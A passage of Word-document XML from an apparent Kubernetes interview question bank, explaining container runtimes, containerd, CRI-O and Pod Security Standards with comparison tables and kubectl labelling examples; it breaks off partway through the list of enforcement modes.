        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Container Runtime Interface (CRI)</w:t>
        <w:br/>
        <w:t>Kubernetes uses a standard called CRI (Container Runtime Interface) so it can work with different runtimes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of container runtimes</w:t>
        <w:br/>
        <w:t>1. High-level runtimes</w:t>
        <w:br/>
        <w:t>Handle image management + container lifecycle:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * containerd</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * CRI-O</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Low-level runtimes</w:t>
        <w:br/>
        <w:t>Actually create containers using Linux kernel features:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * runc</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * crun</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular runtimes</w:t>
        <w:br/>
        <w:t>1. containerd (most common)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Lightweight and widely used</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Originally part of Docker</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Default in many Kubernetes setups</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. CRI-O</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Designed specifically for Kubernetes</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Lightweight alternative to containerd</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Docker (legacy in Kubernetes)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Previously used directly</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Now replaced internally by containerd (via Docker shim removed)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works step-by-step</w:t>
        <w:br/>
        <w:t xml:space="preserve">         1. kubelet receives Pod spec</w:t>
        <w:br/>
        <w:t xml:space="preserve">         2. kubelet sends request to container runtime (via CRI)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         3. Runtime pulls image from registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">         4. Runtime creates container using Linux namespaces + cgroups</w:t>
        <w:br/>
        <w:t xml:space="preserve">         5. Container starts running</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key responsibilities of runtime</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Image pulling (from Docker Hub, ECR, etc.)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Container creation</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Resource isolation (CPU, memory)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Networking setup (with CNI plugins)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Lifecycle management (start/stop/restart)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kubernetes = manager</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kubelet = supervisor</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * container runtime = worker who actually builds and runs the container</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Container runtime vs Kubernetes components</w:t>
        <w:br/>
        <w:t>Component</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Role</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kubelet</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Node agent</w:t>
        <w:br/>
        <w:tab/>
        <w:t>container runtime</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runs containers</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CNI</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Networking</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CSI</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Storage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why runtime matters</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Performance of container startup</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Security isolation</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Resource efficiency</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Compatibility with Kubernetes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Use containerd or CRI-O in production</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Avoid legacy Docker runtime</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Keep runtime updated for security patches</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A container runtime is the software component responsible for pulling container images and running containers on a node by managing their lifecycle and resource isolation using Linux kernel features, and it is accessed by Kubernetes through the Container Runtime Interface (CRI) to execute Pods on worker nodes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q314. Explain containerd.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: containerd is a lightweight, high-performance container runtime that manages the complete lifecycle of containers in systems like Kubernetes.</w:t>
        <w:br/>
        <w:t>It is one of the most widely used Container Runtime Interface (CRI) implementations today.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>containerd is the engine that pulls images, creates containers, and runs them efficiently on a node.</w:t>
        <w:br/>
        <w:t>It is responsible for running containers, not building them.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why containerd is used</w:t>
        <w:br/>
        <w:t>It was created to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Replace heavy Docker runtime components inside Kubernetes</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Improve performance and stability</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Provide a simpler, modular runtime</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Follow Kubernetes CRI standards</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Where containerd fits in Kubernetes</w:t>
        <w:br/>
        <w:t>Kubernetes → kubelet → containerd → runc → containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kubelet → sends instructions</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * containerd → manages lifecycle</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * runc → actually creates containers</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Architecture of containerd</w:t>
        <w:br/>
        <w:t>1. High-level responsibilities</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Image pull from registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Container lifecycle management</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Snapshot management</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Networking hooks (via CNI)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Low-level execution</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Delegates container creation to runc</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Uses Linux namespaces + cgroups</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key components</w:t>
        <w:br/>
        <w:t>1. containerd daemon</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Runs in background</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Handles API requests from kubelet or CLI</w:t>
        <w:br/>
        <w:t>2. ctr / nerdctl (CLI tools)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Used to interact with containerd</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How containerd works (flow)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         1. kubelet requests container creation</w:t>
        <w:br/>
        <w:t xml:space="preserve">         2. containerd pulls image from registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">         3. containerd prepares filesystem snapshot</w:t>
        <w:br/>
        <w:t xml:space="preserve">         4. containerd calls runc</w:t>
        <w:br/>
        <w:t xml:space="preserve">         5. runc creates container using Linux kernel</w:t>
        <w:br/>
        <w:t xml:space="preserve">         6. container starts running</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features</w:t>
        <w:br/>
        <w:t>1. Image management</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Pull, push, store images</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Supports OCI (Open Container Initiative) images</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Container lifecycle</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Start</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Stop</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Pause</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Delete</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Restart</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Snapshot management</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Efficient filesystem layering (overlayfs)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Kubernetes integration</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Uses CRI plugin (cri-containerd)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Default runtime in most clusters today</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>containerd vs Docker</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>containerd</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Docker</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runtime only</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Full platform</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Build images</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌ No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅ Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes usage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Native</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Deprecated (shim removed)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Weight</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lightweight</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Heavier</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Performance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Moderate</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>containerd vs runc</w:t>
        <w:br/>
        <w:t>Component</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Role</w:t>
        <w:br/>
        <w:tab/>
        <w:t>containerd</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Manager (lifecycle + images)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>runc</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low-level container creator</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a factory:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kubernetes = manager</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * containerd = factory supervisor handling workflows</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * runc = machine that physically builds the product (container)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why it replaced Docker in Kubernetes</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Docker had extra layers (UI, build tools)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kubernetes only needed runtime</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * containerd is simpler and faster</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Better compliance with OCI standards</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-world usage</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Default runtime in:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * GKE</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * EKS</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * AKS (in many setups)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Modern kubeadm clusters</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Lightweight and fast</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Stable and production-ready</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kubernetes-native CRI support</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Modular architecture</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Widely adopted in cloud environments</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * No image building capability (need Docker/BuildKit for that)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * CLI is less user-friendly than Docker</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Requires understanding of Kubernetes ecosystem tools</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>containerd is a lightweight, industry-standard container runtime that manages the lifecycle of containers by pulling images, managing storage and snapshots, and delegating container execution to runc, and it is widely used in Kubernetes clusters as a CRI-compliant runtime for running workloads efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q315. What is CRI-O?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: CRI-O is a lightweight container runtime designed specifically to run containers in Kubernetes using the Kubernetes Container Runtime Interface (CRI).</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>CRI-O is a minimal, Kubernetes-focused container runtime that replaces Docker for running Pods efficiently.</w:t>
        <w:br/>
        <w:t>It is built only for one purpose: run Kubernetes workloads (no extra features).</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why CRI-O exists</w:t>
        <w:br/>
        <w:t>Earlier Kubernetes setups used Docker, but:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Docker had unnecessary components (build tools, CLI, etc.)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kubernetes only needed a runtime</w:t>
        <w:br/>
        <w:t>So CRI-O was created to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Be lightweight</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Be Kubernetes-native</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Follow OCI (Open Container Initiative) standards</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Reduce overhead and complexity</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Where CRI-O fits in Kubernetes</w:t>
        <w:br/>
        <w:t>Kubernetes → kubelet → CRI-O → runc → Containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kubelet communicates via CRI</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * CRI-O handles container lifecycle</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * runc creates containers at low level</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features of CRI-O</w:t>
        <w:br/>
        <w:t>1. Kubernetes-native design</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Built specifically for Kubernetes CRI</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * No extra Docker-like features</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Lightweight runtime</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Minimal dependencies</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Smaller footprint than Docker/containerd stacks</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. OCI compliance</w:t>
        <w:br/>
        <w:t>Supports:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * OCI container images</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * OCI runtimes like runc or crun</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Image management</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Pulls images from registries (Docker Hub, ECR, etc.)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Uses standard container image formats</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. Security focus</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Simple attack surface</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * No unnecessary daemon features</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Works well with SELinux, seccomp</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Architecture of CRI-O</w:t>
        <w:br/>
        <w:t>Components:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * CRI-O daemon → handles CRI requests</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * runc/crun → low-level container execution</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Image libraries → pull/store container images</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How CRI-O works</w:t>
        <w:br/>
        <w:t xml:space="preserve">         1. kubelet sends Pod request via CRI</w:t>
        <w:br/>
        <w:t xml:space="preserve">         2. CRI-O receives request</w:t>
        <w:br/>
        <w:t xml:space="preserve">         3. Pulls required image from registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">         4. Sets up container filesystem</w:t>
        <w:br/>
        <w:t xml:space="preserve">         5. Calls runc to create container</w:t>
        <w:br/>
        <w:t xml:space="preserve">         6. Container runs inside Pod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CRI-O vs containerd</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CRI-O</w:t>
        <w:br/>
        <w:tab/>
        <w:t>containerd</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes-only runtime</w:t>
        <w:br/>
        <w:tab/>
        <w:t>General container runtime</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scope</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Narrow</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Broad</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Very low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Features</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Minimal</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Rich ecosystem</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Adoption</w:t>
        <w:br/>
        <w:tab/>
        <w:t>OpenShift-heavy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Widely used in cloud</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CRI-O vs Docker</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CRI-O</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Docker</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes usage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Native CRI runtime</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Deprecated in Kubernetes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Extra tools</w:t>
        <w:br/>
        <w:tab/>
        <w:t>None</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Build, CLI, compose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Weight</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lightweight</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Heavy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Focus</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runtime only</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Full platform</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kubernetes = factory manager</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * CRI-O = minimal machine that only produces containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * containerd = slightly more versatile machine system</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Where CRI-O is commonly used</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Red Hat OpenShift (primary runtime)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enterprise Kubernetes distributions</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Security-focused environments</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Lightweight cluster setups</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Advantages</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Very lightweight</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Strong security posture</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kubernetes-specific optimization</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Easy to maintain</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Fast startup performance</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Less feature-rich than containerd</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Smaller ecosystem</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Not suitable for non-Kubernetes use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Less CLI tooling support</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>CRI-O is a lightweight, Kubernetes-native container runtime that implements the Container Runtime Interface (CRI) and is designed specifically to run OCI-compliant containers in Kubernetes clusters by delegating container execution to low-level runtimes like runc, offering a minimal and secure alternative to general-purpose runtimes like containerd or Docker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q316. Explain pod security standards.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pod Security Standards (PSS) in Kubernetes are a built-in set of security policies that define how restrictive a Pod’s security configuration should be.</w:t>
        <w:br/>
        <w:t>They replace the older Pod Security Policy (PSP) mechanism and are used to enforce baseline security rules at the namespace level.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Pod Security Standards define how “safe” or “restricted” Pods must be before they are allowed to run in a cluster.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Pod Security Standards exist</w:t>
        <w:br/>
        <w:t>They help to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Prevent insecure container configurations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Reduce attack surface in clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enforce security best practices consistently</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Replace deprecated PodSecurityPolicy (PSP)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The 3 Pod Security levels</w:t>
        <w:br/>
        <w:t>1. Privileged (least restrictive)</w:t>
        <w:br/>
        <w:t>Maximum flexibility, minimal restrictions</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Allows almost all capabilities</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Used for system components or trusted workloads</w:t>
        <w:br/>
        <w:t>Characteristics:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Can run as root</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Can use privileged containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * No restrictions on Linux capabilities</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Baseline (moderate security)</w:t>
        <w:br/>
        <w:t>Balanced security for general workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Blocks known unsafe configurations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Allows most standard applications to run</w:t>
        <w:br/>
        <w:t>Characteristics:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Prevents privileged containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Disallows host access (hostNetwork, hostPID, etc.)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Restricts unsafe Linux capabilities</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Restricted (most secure)</w:t>
        <w:br/>
        <w:t>Strong security enforcement (zero-trust style)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enforces strict best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Designed for production workloads with high security requirements</w:t>
        <w:br/>
        <w:t>Characteristics:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Must run as non-root</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Requires read-only root filesystem</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Drops all Linux capabilities by default</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enforces seccomp profiles</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Pod Security Standards are applied</w:t>
        <w:br/>
        <w:t>They are enforced using namespace labels:</w:t>
        <w:br/>
        <w:t>Example: Baseline mode</w:t>
        <w:br/>
        <w:t>kubectl label namespace dev \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  pod-security.kubernetes.io/enforce=baseline</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example: Restricted mode</w:t>
        <w:br/>
        <w:t>kubectl label namespace prod \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  pod-security.kubernetes.io/enforce=restricted</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Enforcement modes</w:t>
        <w:br/>
        <w:t>1. enforce</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Blocks non-compliant Pods</w:t>
        <w:br/>
        <w:t>2. audit</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Allows Pods but logs violations</w:t>
        <w:br/>
        <w:t>3. warn</w:t>
        <w:br/>
